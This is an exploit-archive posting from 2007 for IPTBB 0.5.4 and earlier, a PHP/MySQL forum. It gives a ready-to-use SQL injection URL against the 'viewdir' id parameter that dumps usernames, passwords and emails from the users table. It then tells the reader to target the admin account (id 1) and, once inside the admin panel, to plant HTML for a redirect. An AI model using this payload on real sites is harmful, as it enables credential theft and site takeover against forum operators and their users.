IPTBB <= 0.5.4 (viewdir id) Remote Sql Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IPTBB <= 0.5.4 (viewdir id) Remote Sql Injection Vulnerability
# Published : 2007-12-31
# Author : MhZ91
# Previous Title : AGENCY4NET WEBFTP 1 download2.php File Disclosure Vulnerability
# Next Title : MyPHP Forum <= 3.0 (Final) Multiple SQL Injection Vulnerabilities

---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |_______    _____/  |_          /_   |/  |_
 |   |/        |  | _(__  <_/ ___   __  ______  |      __
 |   |   |     |  |/         ___|  |   /_____/  |   ||  | 
 |___|___|  /__|  /______  /___  >__|            |___||__| 
          /______|      /     /                          
---------------------------------------------------------------

Http://www.inj3ct-it.org        Staff[at]inj3ct-it[dot]org   

---------------------------------------------------------------

          Remote Sql Injection

---------------------------------------------------------------

# Author: MhZ91
# Title: IPTBB <= 0.5.4 Remote Sql Injection
# Download: http://sourceforge.net/projects/iptbb/
# Bug: Remote Sql Injection
# Info: IPTBB is a free forum system built using PHP and mysql.
# Visit: http://www.inj3ct-it.org

---------------------------------------------------------------

http://[site]/index.php?act=viewdir&id='+union+select+1,concat(username,char(58),password,char(58),email,char(58),msn)+from+iptbb_users+where+id=[UserID]/*

Change [UserID] whit id of member u want get user and password ( the default id of the admin is 1 ) .

In the admincp.php , in general settings, u can insert a html code for redirect .

---------------------------------------------------------------

# www.Syue.com [2007-12-31]